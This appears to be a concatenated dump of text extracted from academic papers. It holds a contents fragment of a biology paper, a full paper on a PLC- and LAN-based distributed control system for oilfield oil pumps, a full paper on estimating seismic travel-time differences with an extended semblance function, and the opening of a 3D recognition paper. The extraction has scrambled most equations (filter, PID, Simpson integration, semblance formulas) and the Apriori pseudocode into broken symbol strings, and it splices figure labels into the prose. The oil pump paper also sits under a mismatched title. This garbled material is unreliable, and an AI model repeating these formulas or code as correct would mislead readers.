Obesity-induced changes in the bioenergetics of white adipocytes Linking ATMΦ to human adipocyte bioenergetics ATMΦ and secreted factors affect glucose metabolism/glycolysis of adipocytes The molecular identity of ATMΦ released factors reducing adipose energy metabolism Mediators between ATMΦ and increased adipose energy metabolism Conclusion and outlook Declaration of interest Funding Acknowledgments References work_lbzdpip75bexvoaes77ousbqay ---- (Shengquan Yang) Research of Virtual Classroom’s Collaborative Mechanism Based on Petri Net 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 48 Research of Distributed Control System for Oilfield Oil Pump Based on PLC and LAN Shengquan Yang School of Computer Science and Engineering Xi'an Technological University Xi'an, China e-mail: xaitysq@163.com Chen Gong School of Computer Science and Engineering Xi'an Technological University Xi'an, China e-mail: 1395861613@qq.com Abstract—In order to change the current bad situation such as the high cost of manpower, the failure to deal with the fault in time and the low management efficiency, etc. in oilfield oil pump measure and control, this paper puts forward the research and development of oilfield oil pump distributed control system based on PLC and LAN. Firstly this paper describes the operation principle of oil pump equipment and gives its network topology model. Secondly it designs the system macro distributed structure framework with 4 layers: Pump layer, PLC layer, IPC layer and RCC layer in detail. Finally the paper discusses the design of the software system including the PLC on-site field measure and control software subsystem, the IPC local session software subsystem and the RCC remote management software subsystem. Keywords-Oil Pump; PLC; LAN; Distributed Control I. INTRODUCTION Oil pump is an important core production power equipment for oil pipeline of oilfield enterprises. The traditional oil pump adopts manual inspection or computer combined with gauges and instruments, and local single- point auxiliary measurement and control [1]. Most of the oil pumps are arranged in unhindered and wild mountains and are huge in number. The traditional way of measurement and control will inevitably cause the high cost of manpower and low management efficiency of the oil field enterprises, Equipment oil transport failures often occur while the pump equipment can not work normally because maintenance personnel are far from the workplace of the malfunction and it can not be processed in time, which causes crude oil leaks or production stagnation. Programmable Logic Controller (PLC) is a microelectronic program control device which has strong anti-jamming performance and high stability and supports complex logic, data processing and network communication. Industry Personal Computer (IPC) is a full-fledged computer that supports industrial production process control, data storage, graphic display, dynamic curve and other functions under harsh industrial environment [2]. Because the production site is extremely dispersed irregularly, usually away from the site management office. With the help of Local Area Net (LAN), we can transmit the control pictures of IPC in the oil pump field at the same time to the oil pump equipment operating engineer's office to achieve real-time view and control. The local oil pump can be unattended, and can be found immediately and promptly sent to the site if there is a fault alarm. Therefore, the study adopts field PLC, IPC and LAN on local enterprise to achieve the local and remote joint measurement and control of multi oil pump. The local oil pump firstly can be controlled initially by autonomous operation, and the remote center can control the multi spot on the spot in real time. This is a distributed control structure which can achieve the advantages of highly centralized management and decentralized control. This is of great significance for the oil field enterprises which can make the global oil pipeline equipment run safely, facilitate the remote management operation, reduce the manpower cost and improve the operation efficiency. II. OPERATION PRINCIPLE OF OIL PUMP EQUIPMENT Figure 1. Oil pump operating process diagram The oil delivery pump system is mainly composed of a mechanical base, an oil delivery main pump, an oil delivery backup pump, a switch two position valve, an analog regulating valve, a three way switcher, an accident buffer tank, a mechanical pipeline, a frequency converter and various sensors [1]. Its function is to filter, heat up, buffer The general organ imports crude oil The failure accident temporary cache tank The three-way switch The oil delivery main pump The oil delivery backup pump The external output oil pipeline The site crude oil depot The crude oil filter 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 49 and pressurized the crude mixture which is sent from the general authority (or the wellhead) through the pipeline, and then transport it to the site oil depot according to the suitable flow rate. Its operation principle of oil transportation is shown in Figure 1. First of all the crude oil mixture which sent by the general organ or the pumping unit, through the mechanical pipeline to the crude oil filter to filter out the granular impurities, such as soil, slag, and so on. Then according to the set of oil transportation process, the three-way switch is sent to the main oil pump or the oil backup pump, and the crude oil is regulated to the appropriate outlet pressure through the oil pump, and then transported to the original oil depot through the external output oil pipeline. Because the flow and pressure of the total mechanism fluctuate greatly, the system needs intelligent control through the algorithm to the main pump or the pump frequency converter, to ensure the constant pressure of external transmission. If the external transmission pressure is too small, the external distance will not have motive force to run. Otherwise the pressure is too high, which will cause the ecological disaster, such as the leakage of the oil pipeline and other ecological disasters. If the pressure of oil which come from the total mechanism is too high beyond the tolerance range of pump or filter clogging. Then it need to cut off the entrance to the oil pump, and make oil tank failure directly into the cache. The crude oil level fault tank inside the cache reaches a certain height and then through the oil pump output out. III. NETWORK TOPOLOGY AND MACRO STRUCTURE OF DISTRIBUTED MEASUREMENT AND CONTROL SYSTEM FOR OIL PUMP According to surveying the distribution of oil pump in Changqing oil field, Daqing oilfield and Yanchang oil field, they are most regularly distributed in the wilderness. No matter the size of the oil field, their physical equipment and technology are basically the same, and an oil field generally is made up of several 1#, 2#... N# oil pump. In the follow-up article content the network topology is designed firstly, and the overall macro structure is further designed. A. Topology design of system network According to the characteristics of the operation process of the oil pump and the objective reality of the dispersion distribution of the multi-pump, a network topology of the oil pump remote measurement and control system as shown in Figure 2 is designed. This system is a typical star topology. All peripheral terminals IPC are connected to a Remote Control Center (RCC) computer through an enterprise LAN router. This central node manages the access and control of multiple distributed terminal nodes, and forms a distributed control system based on the network (NDCS), which is an extended application of the traditional DCS theory [2]. NDCS adopts the basic design idea of centralized management, centralized operation, dispersive measurement and decentralized control, and adopts the structure form of multi-layer classification and network communication. Figure 2. Oil pump distributed measurement and control network topology B. Overall macro structure of system remote measurement and control According to the characteristics of the network topology and the detailed requirements for the measurement and control of the oil pump, and following the principle of top- down and gradual subdivision, we have designed the overall macrostructure of the system NDCS as shown in Figure 3. The whole system is designed in a hierarchical way. There are four levels. The whole system is Pump layer (sensor layer), PLC layer (control layer), IPC layer (conversation layer) and RCC layer (management layer) from below [5]. The specific description is as follows: 1) The bottom of the system is the oil pump layer, that is, the Pump layer is also known as the sensing layer. Oil pump is the measure and control object of the whole system, composed of various sensors and actuators, including pressure, temperature, liquid level, flow rate, switch and other sensing signal input, main pump and standby pump start and stop switch output, three-way valve regulating opening size, analog output and digital frequency control of oil pump frequency converter. 2) The middle and lower layer of the system is the PLC layer, also known as the control layer. PLC consists of CPU, RS485, RJ45, and extension modules. The extension module includes the switch quantity I/O unit, the analog input A/D unit, the analog output D/A unit, all of which are connected with the CPU through the internal bus. RS485 is embedded in the external communication bus on the CPU unit. It is based on the standard Modbus RTU and inverter to control the serial communication [3]. RJ45 is the standard Ethernet port on the CPU unit, which is connected to the upper middle IPC mainly through the FINS NET protocol. 3) The upper and middle layer of the system are 1#, 2#, …N# IPC layer which consists of local IPC of the oil pump. On the one hand, the IPC layer carries on the local measurement and control through the FINS NET to PLC's conversation. On the other hand, it transfers the local data or accepts the RCC remote control instruction through the 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 50 conversation between the enterprise LAN and the top RCC, so it is also called the conversation layer. Figure 3. Oil pump control system hardware macro structure 4) The top layer of the system is the RCC level. It can perform data acquisition, curve display, early warning analysis, dynamic process picture, parameter setting and other functions for all oil pumps, it realizes the remote centralized operation and management of the oil pump group through the network, so it is also called the management layer. Designing the remote distributed centralized control of the oil pump into different arrangements, each layer requires a different software subsystem to implement separately, the upper and lower layers connect through the hardware circuit and the software API interface function, software subsystems of different layers can be studied and developed in parallel. This not only reduces the complexity of the overall system, but reduces the development cycle. IV. DISTRIBUTED CONTROL SYSTEM SOFTWARE FOR OIL PUMP In the hardware layering of the system besides the Pump layer sensor has a standard circuit interface, so it does not require programming. The other layers need to design the corresponding software subsystems separately, which includes: the field PLC field measurement and control software subsystem, the IPC local session software subsystem and the RCC remote management software subsystem. A. The field PLC field measurement and control software subsystem This system uses CJ2M-31 PLC as the field oil pump controller which comes from a famous Omron company in the field of automation, of which software development uses the CX-Program V9.3 integrated development environment. Using the ladder graph LAD that follows the IEC standard and compiling the SCL-ST language, five cyclic control SCL-ST subroutines are designed, and its PLC main ladder LAD program is shown in Figure 4. Figure 4. PLC main ladder diagram LAD program Each cycle control subprograms are executed periodically under main control scheduling that implements the management of their start-up, concurrency, synchronization, and stop. The detailed description of the content is as follows: 1) Data collection circular subroutine AnalogWork: Completing acquisition of module data such as multiple analog AD081-V1, switch quantity ID231 and so on. These data acquisition needs to be filtered and Remove the interfering data and store it in the DM area. The system uses external serial communication TCP / IP remote access N# pump local IPC (local HMI) Oil pump remote control center computer (RCC) LAN N # pump local programmable logic controller (CPU) PLC external FINS NET communication A/D unit D/A unit I/O unit In le t o u tle t p re ssu re se n so r P u m p te m p e ra tu re se n so r O u te r o u tle t flo w se n so r A c c id e n t b u ffe r le v e l se n so r M a in th re e -w a y sw itc h B a c k u p th re e -w a y sw itc h P u m p s O n /O F F O p e ra tio n S o le n o id v a lv e o u tp u t sw itc h P u m p s O n /O F F S ta te In p u t PLC internal bus PLC internal bus M a in p u m p fre q u e n c y B a c k u p p u m p fre q u e n c y RS485 RJ45 1# pump local IPC (local HMI) …… 1# oil pump PLC 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 51 the RC low pass filter for smoothing the data, and its mathematical transfer function is: 1 1 )( )( )(   f S TsX sY G , Tf=RC is the time constant of the filter, dispersing the mathematical function to obtain the PLC, the difference algorithm formula for its implementation is: Y(n)= α Y(n-1)+(1- α )X(n), TT T f f  α ,T is the sampling period, X (n) is the current nth sample, Y (n) is the current filter result data of the nth. 2) Logic control loop processing subroutine LogicModule: Completing all the internal logic control functions of the system, It has a raw rule library inside. Written by the PLC ST language, the rule form is the former condition (the execution condition) A - the following condition B (regular body), condition A and B can also be compound logical expressions composed of operators such as NOT, AND, OR, XOR and so on. A represents the logical operation conditions, and B represents processing. For example: IF MainPumpRun AND OilPressureHigh THEN SetAlarmOn AND SetPause On, of which expression means that when the main pump is running and the pressure is too high, PLC immediately outputs the alarm and pause the system. 3) Pressure PID control loop subroutine PIDWork: Completing the frequency PID control of the frequency converter , that is to use the PID algorithm to control the speed of the main pump or the pump to achieve the outlet pressure in line with the pressure curve set by the oil pump process. The differential equation of the PID control algorithm in PLC is [6]:         t D I P dt tde Tdtte T teKtmv 0 )( )( 1 )()( In the formula, )()()( tPVtSVte  is a deviation, it represents the running time of the controller, the TI is the integral coefficient, the TD is the differential coefficient, and the KP is the ratio coefficient, mv(t) indicates the output of the output t time of the algorithm. This subsystem uses SCL- ST code programming to achieve incremental PID control in Omron PLC, when running, select the appropriate proportion P, integral I, differential D parameters, and of course you can also call PLC built-in PID instructions to achieve. 4) Three - way switcher control loop subroutine DAValveCtl: Completing flow control of oil pump, on the one hand it controls the DA output of the three - way valve, on the other hand it controls the oil pump to be executed automatically according to the selected process. The main control processes are varied. According to time plan TimePlan to performs the main standby pump in turn, and it performs pump according to the flow plan FluxPlan, and executes pumps in turn according to the oil pump temperature plan TempPlan and so on. 5) Communication response loop subroutine CommWork: On the one hand, the RS485 communication is done to the transducer of the sensing layer, and on the other hand, the RJ45 communication for the upper IPC is prepared. PLC and frequency converter communication follow the standard Modbus RTU protocol, its command frame format as shown in Table 1. TABLE I. RTU TRANSMISSION MODE COMMAND FRAME FORMAT Pump slave address Function code Data Checksum 8bits(01-02) 8bits(01-19) N*8bits 16bits(CRC 16) It complies with the FINS TCP Industrial Ethernet communication standard when PLC and IPC carry out RJ45 network communications. It is compatible with any Ethernet, Controller Link and SYSMAC LINK network system [4]. Its protocol format adds a FINS header to the traditional TCP / IP. B. IPC local session software subsystem The oil pump IPC local session software subsystem is developed based on the object-oriented (OOP) integrated environment and completed by the programming mechanism of multi thread (Multi-Thread). According to the function of the system, the multithreading workflow of the IPC local session subsystem is designed as shown in Figure 5. Considering that the oil pump is a special key equipment in the oilfield enterprises, the users of the system have oil pump technicians, equipment safety personnel, ordinary operation workers, system administrators, etc., and they have different tasks in the oil pump operation, so subsystem design uses role based access mechanisms, in which different roles have different permissions when accessing the system. The thread is managed by the user role, and then the thread is selected by the role permission interface to produce different running interfaces. The other threads run in parallel, and they all have their own CRunTimeData space that does not interfere with each other, concurrently completing: downlink and PLC real-time carry out RJ45 FINS communication, the uplink and remote RCC complete the TCP/IP communication, the oil pump data processing record storage, the oil pump dynamic curve display and the PLC operation parameter view setting and so on function. 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 52 Figure 5. Oil Pump IPC Local conversation subsystem multithreading design After IPC collecting of PLC data, it should be stored after operation, for example, in the "oil pump data processing record storage thread", by collecting the oil flow rate f (T), the calculation of oil transmission tired measurement needs to be completed by the digital integration algorithm, and its mathematical expression is:  Tb Ta dttf )(Q , among them, Q indicates the accumulation of oil, Ta indicates the beginning time, Tb is the end time, and f (T) is the function of oil flow collection. When the programming is realized, the solution is solved by the complex Simpson algorithm, and its discrete formula is as follows:     1 1 )(2)()([ 6 )(V n k kba Tb Ta XfTfTf h dttf ])(4 1 1 2 1     n k kXf Among: hkTa XX X kk k )2/1( 2 1 2 1      Illustration:[Ta, Tb] is divided into n parts, taking equidistant nodes. C. RCC remote management software subsystem The RCC remote management software subsystem is based on the real-time requirements and special requirements of the oilfield LAN, and its design uses the classic industrial control C/S architecture. The human-machine interface of the subsystem proceeds from the whole situation of the management of all oil transport pumps in the oil field enterprises. It is more than the IPC local subsystem to manage and dispatch the threads of the production and operation of all oil transport pumps and the thread of the remote safety decision analysis of the global oil transmission equipment, and the other is similar to the IPC local subsystem, which is limited to the length of the text. The RCC remote management software subsystem focuses on the global remote control management function, then it can collect all the data of the oil pump, and then carry out large data analysis and process data mining, adopts a data mining algorithm based on classical Apriori algorithm for association rules. The main code is as follows: Procedue OilPumpApriori(Lk); Begin L1={large 1-itemsets}; For (k=2; Lk-1<>; k++) do begin Ck=apriori_gen(Lk-1); For all transactions tD do begin Ct=subset(Ck,t); for all candiates cCt do c.count= c.count+1; end Lk={ cCk|c.countmin_sup } end; L= kk L ; End. V. CONCLUSION By using an object-oriented integrated development environment in the Windows 7 operating system, Embarcadero RAD Studio XE、CX-Program V9.3 and open source network database MySQL 5.6, the distributed measurement and control system of oil delivery pump based on PLC and LAN is successfully developed. The system has been successfully applied in a Chinese oil field enterprise, and the actual development of RCC remotely the human- machine interface of one of the stations in which the oil pump operates as shown in Figure 6. After a year of feedback from the company, it shows that the system has high information level, reduced the difficulty of multi pump collaborative management, improved the efficiency of equipment safety management, and greatly reduced the operation cost of oil production. This article putted forward the remote control system which uses LAN and PLC to design in a hierarchical manner, and it simplifies the problem of complex equipment measurement and control. So it provides a better design method and model for remote control of similar equipment and has a strong practical application and promotion value. Oil pump IPC user role management thread PLC operating parameters view set thread Select interface thread based on role Pump dynamic trend curve show thread Pump dynamic process screen show thread Pump data processing records stored thread Uplink TCP / IP communication processing thread Downlink RJ45 communication processing thread 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 53 Figure 6. RCC remote site oil pump process operation interface ACKNOWLEDGMENT The Research is supported by the new network and detection control national and local joint engineering laboratory. (Financing projects No. GSYSJ2016014). REFERENCES [1] CUI Hai-Li, ZHAO Hai-jun, CHEN Peng, “Oil Pump Performance Detection and Fault Analysis,” Petro-Chemical Equipment, vol. 41, pp. 106-108, April 2012 [2] WANG Li-Wen, CHEN Yuan-jun, CHEN Bin, “Aircraft ground deicing monitoring system based on GPRS and PLC,” Computer Engineering And Design, vol. 37, pp. 2062-2066, Aguest 2016 [3] ZHANG Nai-lu, LI Yong-jin, ZHANG Yu-xiang, “Gas station integrated information monitoring system based on internet of things,” Microelectronics & Computer, vol. 33, pp. 130-134, February 2016 [4] QI Lei, HAN Zhe, CHEN Shuang, CHEN Zhao, “Design and realization of the measuring and controlling system of vacuum making wave machine based on S7-1200 Ethernet communication,” Industrial Instrumentation & Automation, vol. 3, pp. 31-34, March 2016 [5] WU Qiu-yang, LI Tian-ping, “Improvement and Application of DCS Gas-Fried Oven Temperature Control System,” Journal of Shandong Normal University(Natural Science), vol. 31, pp. 60-63, March 2016 [6] E.B.Priyanka, C.Maheswari, B.Meenakshipriya, “Parameter monitoring and control during petrol transportation using PLC based PID controller,” Journal of Applied Research and Technology, vol. 14, pp. 125-131, February 2016 work_lc2vjdyopfgd5fx347xmqj6ore ---- Your Paper's Title Starts Here: Please Center Estimation Algorithm for Low Frequency Seismic Motions Based on Extended Semblance Function Lianming Sun Faculty of Environmental Engineering, The University of Kitakyushu 1-1 Hibikino, Wakamatsu, Kitakyushu 808-0135, Japan, sun@kitakyu-u.ac.jp Abstract. Monitoring low frequency and long period ground motions is very important for earthquake detection and alarm systems, and signal processing techniques help to investigate the mechanism of deep ground motions and earthquake occurrence by detecting effective seismic information from the seismograms. In this paper a frequency domain algorithm is presented to estimate the travel time difference of seismic waves with multi-path interferences caused by the refraction effect. The spectra of the seismograms are calculated through the fast algorithm, and the multi- path parameters as well as the difference of travel time between a reference position and the seismographic stations are given by an optimization algorithm in the frequency domain. The new approach can work under conditions of refraction interference, and improve the estimation performance by using an extended semblance function. Its effectiveness is demonstrated through some numerical examples, and it is shown that the proposed algorithm is applicable to the analysis of low frequency seismograms. Keywords: Spectral analysis, low frequency seismograms, semblance function, frequency domain. 1. Introduction It has been revealed that the fault activities often accompany by low frequency underground motions, and long period of their accumulation may induce earthquakes. Since many geological phenomena are so complicated that the mechanisms of deep ground tremors and fault slips still remain mysteries, it is difficult to construct an effective physical model for the low frequency motions. Consequently, it is an essential task to monitor the low frequency seismic motions and then to give the alarm of earthquake occurrence. With the significant progress of instrumentation technology, several seismographic networks have been applied to directly monitor the seismic activities in the urgent earthquake detection and alarm systems. Incorporated Research Institutions for Seismology (IRIS) in America, International Data Center managed by Comprehensive Test Ban Treaty (CTBT), Hi-net, Kyoshin-net (K-net) in Japan, are the typical monitoring networks [1]. Using the monitoring networks, the low slip or low-frequency earthquakes, which are considered as the characteristic mode of moment released at a deep structure of a subduction plate interface, are detected from the seismograms [2-5]. Moreover, revealing their mechanisms may help to explore the intrinsic characteristics of seismic phenomena. Nevertheless, the detected signals of low frequency seismograms do not have obvious P-wave and S-wave arrivals; hence it is not easy to locate the epicenters through the ordinary hypocenter determination method [2]. Some array signal processing methods were proposed to maximize a semblance function using a grid search algorithm, then to maximize the cylindrical wave index using steepest descent algorithm [5, 6], or to synchronize the peak of correlation functions of the detected seismic waves in the array records [7]. These methods were performed in time domain, and had been applied in analysis of seismic tremor in Bungo channel region [3], Tokachi channel region [5], Kyoto basin [7], and the long period ground motion of deep ground structure in Yokohama city [8]. Furthermore, the large array scale is often desired in order to acquire much seismic information, whereas a fine grid is required to avoid local minimum in the existing time domain methods. As a result, they lead to considerably heavy computational load. On the other hand, the representation of semblance coefficient has been investigated in the frequency domain, and a frequency domain algorithm has been developed to reduce the computational complexity since some fast frequency algorithm can be utilized [10, 11]. It could achieve the similar accuracy as that of the time domain; moreover, the performance of the presented frequency approach can be improved by compensating the discretization error at low sampling rate. However, when the seismic waves have refraction effects, the multi-path interferences occur and they will shift the maximum of the conventional semblance function due to the side-lobe effects of multi-path. As a result, the estimation accuracy of travel time as well as epicenter location degrades significantly; therefore the effective techniques to reduce the multi- path effects are necessary in the processing algorithms. An extended semblance function is investigated in this paper. By performing subspace decomposition of the spectral data space, the multi-path parameters can be estimated, and the optimization for the extended semblance function yields the estimation of travel time difference between a reference position and tiltmeter stations. It is seen that the multi-path effects can be handled easily in the frequency domain using the estimated parameters, and the estimation of fine travel time difference can improve the location accuracy of epicenter from the seismograms spectra in the proposed algorithm. Some numerical simulations demonstrate the effectiveness of the proposed approach. 2. Problem Statement Consider the seismograms observed by the tiltmeter arrays, which are composed of several stations in a tiltmeter network. If the separation distance between these stations is smaller than the wavelength of the interested low frequency seismograms, the sampling of the seismic waves holds most of the original information with little aliasing. In the seismograms of low frequency earthquake, though the records have not explicit P-wave and S-wave arrivals, they might be analyzed by array processing techniques to detect and locate the low frequency earthquakes, and to utilize the information to reveal the occurrence mechanism and activities in subduction zones. Fig.1 Tiltmeter array in monitoring network Fig.1 illustrates a tiltmeter array in the monitoring network. It has L stations, and each station is equipped with a sensor unit at the bottom of a borehole deeper than 100m [3]. Assume that the separation between stations is smaller than the wavelength of seismic waves to reduce the affection of heterogeneity in crust and mantle. The conventional semblance function )( ref tC [5, 6] is defined by                  K k L l ll K k L l ll tkttaL tktta tC 1 1 2 trv,smpref 1 2 1 trv,smpref ref )( )( )( , (1) where k is the sample number within the time window Kk 1 , tref indicates a reference time, tsmp and tl, trv represent the sampling interval, the travel time difference of the lth station from a reference position, respectively, while the later is a function of the propagation path, wave velocity or the horizontal apparent slowness vector, which is a reciprocal vector of velocity. In [5], the semblance function is maximized by finding an appropriate apparent slowness vector using a grid search algorithm, where the grid is set as small spacing in latitude and longitude, and the estimate of epicenter is determined from the estimated vector of apparent slowness. When the grid search algorithm in the time domain is used simultaneously for multiple arrays, the estimation efficiency will be very poor especially for smaller spacing in both latitude and longitude. An efficient frequency domain approach has been considered for the estimation of travel time difference by using the seismic spectra with low computational load [9]. Define the relation function of the observed signal at stations l1 and l2 as follows: .)()(),( ,    K k llllllll tnkttatnktta K nnR 1 smpsmprefsmpsmpref 22112121 1 (2) Then the numerator and denominator of the semblance function can be rewritten as , , , )( ,, , ,, ,                                                 L l ll ll L l L ll ll ll t t t t RL t t t t R L tC 1 smp trv smp trv 1 1 1 smp trv smp trv ref 1 12 21 21 2 1 (3) where [x] is the nearest integer to the real number x. It is easily seen that maximizing the semblance function (1) is equivalent to maximizing the second term of (3). On the other hand, let the Fourier transform of the observed record be defined by ,)()(     K k ik l i l ff ekttaeA 1 smpref  (4) where Ff f /  is the f th frequency grid, FfF  1 . Then the inverse Fourier transform of )()( * ff i l i l eAeA   21 can be given by ).,()()()( , * , kkkReeAeA KF kX ll F Ff iki l i lll fff     11 1 212121 1  (5) Therefore, the semblance function can be approximated by            L l ll L l L ll llll XL kkX L tC 1 1 1 1 ref 0 2 1 1 12 2121 , , , )( , (6) then )( ref tC in (3) reaches a maximum if the values kl1, l2= kl1- kl2 maximize the following function     ,,maxarg,, 1 1 1 , ,, ,12,1 1 12 2121 ,12,1         L l L ll llll kk LL kkXkk LL  (7) and smptrvtrv 2121 tktt llll ,,,  . If the integer F is the power of 2, both )( fi l eA  and   2121 llll kkX , , can be computed through the algorithm of fast Fourier transform, therefore the algorithm can be performed efficiently [10]. Furthermore, a genetic algorithm based approach can be used to give the estimation of epicenter location [11]. 3. Extended Semblance Function Assume that the observed signal at tiltmeter station l can be approximated as follows:  )()()( ,,,, 1smpref10smpref0smpref lllll kttagkttagktta  , (8) where gl,0, gl,1 and 10 ,, , ll  are the gain and delay time of the direct wave, delayed wave, respectively. )( smpref ktta  is the source wave comes from the epicenter. Then the spectral representation of )( smpref ktta l  can be given by ).()( )()()( , , ff fmlfff ii l i M m i ml K k ik l i l eAeG eAegekttaeA            01 smpref (9) It is seen that 0,trv, ll t  if no delay waves in the observed signal )( smpref ktta l  . Let the extended semblance function be given by                             L l F Ff i l i l i l i l L l L ll F Ff i l i l i l i l f f f f f f f f eG eA eG eA L eG eA eG eA L tC 1 1 * * 1 1 1 1 * * ref )( )( )( )( )( )( )( )( 2 1 )( 1 12 2 2 1 1         , (10) then the parameters of gl,m and ml , might be estimated by optimizing the semblance function in (10). Nevertheless, the direct optimization of (10) is difficult since it is a severe nonlinear problem, and the optimization may converge to local solution easily. In order to improve the processing efficiency, a simplified semblance function will be used in the estimation algorithm. 4. Estimation Algorithm Without loss of the generality, let the reference position be the tiltmeter station 1, and fix g1,0 as g1,0=1, then for l = 2, . . ., L, the travel time difference tl,trv of direct waves from the reference position is 010trvl, ,,   lt . Let the sub- semblance function )( , ref1 tC l be given by     . )()()()()()()()( )()()()()()()()( )( **** **** ,           F Ff ii l i l ii l iii l F Ff i l ii l iii l ii l l ffffffff ffffffff eGeAeAeGeGeAeAeG eGeAeAeGeGeAeAeG tC 1 1111 1 1111 ref1 2 2 1   (11) Commonly only a few frequency components are contained in the seismograms, hence the optimization of (11) will be an ill-conditioned problem, and is influenced by noise easily. Instead the direct optimization, the optimization will be performed in the following procedures. A.Initial Values.Set the initial values gl,0=1, gl,1= gl,2=…=0, then the initial estimates of 010trvl, ,,   lt can be obtained by (7). B.Estimation of Multi-path Parameters.These parameters will be estimated by a subspace decomposition technique in a grid research way. Construct a spectral data matrix ),,,,,( ,,,,  212111 lll kkkk containing both the main lobe and the side-lobe of seismic waves as follows: , )()( )()( )()( )()( ),,,,,( 2, 1, 1 )( 1 )( 1 )( 1 )( )()( 2,1,2,11,1 trv,1,1trv,1,1 trv,0,1trv,0,1 trv,1,11trv,1,11 1 T l l T itkiitki itkiitki i l tkii l tki i l i l lll FllFFllF FllFFllF FlFFlF FF eAeeAe eAeeAe eAeeAe eAeA kkkk                                     Ω Ω Ω            (12) where tl,trv is the estimate given in Step A,  is a grid interval. In order to reduce the influence of noise, the subspace decomposition of (12) is performed as follows: ),,,,,(),,,,,( ,,,,,,,,  212111212111 lllll H l H lll kkkkkkkk ΩΩVSU  , (13) then the noise subspace vectors  V , which are the last column vectors in Vl, can be obtained. Denote 1,V and 2,V as the parts corresponding to 1,l Ω , 2,l Ω , respectively, where 1, V is associated with the parameters g1,m, whereas 2,V is associated with the parameters gl,m. Therefore the optimal values of gl,m , kl,m will be given by   .)(maxarg ,,,,, , ,,,,,,,, ,,,,,,,, ,, ,,,, , ,,        VΩΩVVΩΩVVΩΩV VΩΩVVΩΩV l H l H l H l H l H l H l H l H l H l H kk MlM Ml kkgg g 1 1 1 22221111 11222211 11111 01 11    (14) The first term in (14) indicates an approximation of the extended semblance function )( , ref1 tC l , while the second one is the criterion for multi-path parameter estimation. On the other hand, instead of the extended semblance function, an appropriate pre-filter can be utilized to compensate the multi-path effect by using the estimates of gl,m and kl,m [12]. C.Optimization of Extended Semblance Function.Substitute the estimates of gl,m and kl,m into the extended semblance function )( , ref1 tC l , and leave trvl, t as a variable, then the optimization of )( , ref1 tC l with respect to trvl, t yields fine estimate of the difference of travel time between the tiltmeter stations and reference position. D.Estimation of Epicenter Location.Using the estimates of difference travel time trvl, t , the epicenter location can be estimated by the methods given in [5, 11]. Moreover, in order to decrease the influence of noise, the value of semblance function )( , ref1 tC l can be used as weight function for trvl, t in the epicenter estimation. 5. Numerical Examples Some simulation examples are considered to investigate the effectiveness of the proposed algorithm. The main frequency components are within 0.03~1.5Hz, and the components beyond the frequency band, the interferences caused by refraction or reflection are considered as noise. The seismic wave travels at velocity of 3km/s. 10 stations whose separation are within 18.1km~20.5km are utilized in the tiltmeter array, and 10 simulation runs be performed in the example. The true locations of epicenter in 10 runs are randomly distributed as normal distribution as N(39.0622', (3.2909') 2 ) west in longitude, N(18.3011', (2.6903') 2 south in latitude, as uniform distribution as 10~15km in the depth from the reference station 1. There is a refraction wave in the layer depth of 21km. The seismograms are sampled at the sampling rate 20Hz, and the records in a time window of 105s are used for the data analysis. The simulations are performed under the signal to noise ratio of 12.5, 15, 20dB, respectively. The estimation errors of difference travel time and epicenter location are summarized in Tab.1 and 2. For comparison, the results of conventional methods without compensation of multi-path effects are also given in the tables. It is seen that the proposed algorithm can reduce the estimation errors under the situations with multi-path effects, and it works well especially if a great deal of data can be used in estimation even if the signal to noise ration is low. Tab.1 Standard deviation of difference travel time estimation in 10 simulation runs Method Difference travel time(  s) 12.5dB 15dB 20dB Conventional algorithm 0.03716 0.02809 0.02998 Proposed algorithm 0.02518 0.02325 0.01158 Tab.2 Standard deviation of epicenter location in 10 simulation runs Method Epicenter location (  %) 12.5dB 15dB 20dB Conventional algorithm 3.443 3.119 3.934 Proposed algorithm 2.975 1.751 1.754 6. Conclusions The extended semblance function based algorithm has been proposed to estimate the difference of travel time and the epicenter location for low frequency seismograms. It has been shown that the proposed algorithm can perform optimization in the frequency domain, where the side-lobe can be treated by the shift property of signal spectra. Compared with the conventional methods, the proposed algorithm improves the estimation accuracy of the difference travel time when the seismograms have multi-path effects; therefore it can help to locate the epicenter more precisely. The approach to the case with several epicenters, and the effectiveness validation of the real seismograms will be investigated in the future work. References [1] M. Kikuchi. Realtime Seismology, University of Tokyo Press, 2003 [2] K. Obara. “Nonvolcanic deep tremor associated with subduction in southwest Japan,” Science, vol.269, pp.1679- 1681, 2002. [3] H. Hirose and K. Obara.“Repeating short- and long-term slow slip events with deep tremor activity around the Bungo channel regions, southwest Japan,”Earth Planets Space, vol.57, pp.961-972, 2005. [4] Committee for Earthquake Prediction Studies, Seismological Society of Japan.The Science of Earthquake Prediction, University of Tokyo Process, 2007. [5] Y. Asano, K. Obara and Y. Ito. “Spatiotemporal distribution of very-low frequency earthquakes in Tokachi-oki near the junction of the Kuril and Japan trenches revealed by using array signal processing, ” Earth Planets Space, vol.60, pp.871-875, 2008. [6] N.S. Neidell and M.T.Taner.“Semblance and other coherency measures for multichannel,”Geophysics,vol.36, pp.482-497, 1971. [7] C. Shirakawa and T. Iwata.“Ground motion characteristics of South-East Kyoto Basin site using three dimensional small aperture seismic array at Uji Campus, Kyoto University,”Annuals of Disaster Prevention Research Institute, Kyoto University, no.50(B), pp.251-258, 2007. [8] H. Miura and S. Midorikawa.“Effects of 3-D deep underground structure on characteristics of rather long-period ground motion,” Earthquake, no.54, pp.381-395, 2001. [9] W. Zhu, L. Sun and X. Zhu.“Analysis of low frequency seismograms in frequency domain,”ICIC Express Letters, vol.5, no.9(A), pp.3249-3254, 2011. [10] L. Sun and A.Sano.“System identification and error analysis in frequency domain,”International Journal of Innovative Computing, Information and Control, vol.3, no.5, pp.1201-1218, 2007. [11] W. Zhu, L. Sun and X. Zhu.“Epicenter location via genetic algorithm for low frequency seismograms, ICIC Express Letters, vol.6 (to appear) [12] G. Jacovitti and G. Scarano. “Discrete time techniques for time delay estimation,” IEEE Trans. Signal Processing, vol.41, no.2, pp.525-533, 1993. work_lccqoj5iyjfcpd4preqa64baum ---- 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 19 3D Target Recognition Based on Decision Layer Fusion Ma xing a* , Yu Fan b , Yu Haige, Wei Yanxi, Yang Wenhui School of computer science and engineering Xi’an Techonolgical University Xi’an ,710021, Shaanxi e-mail: a* 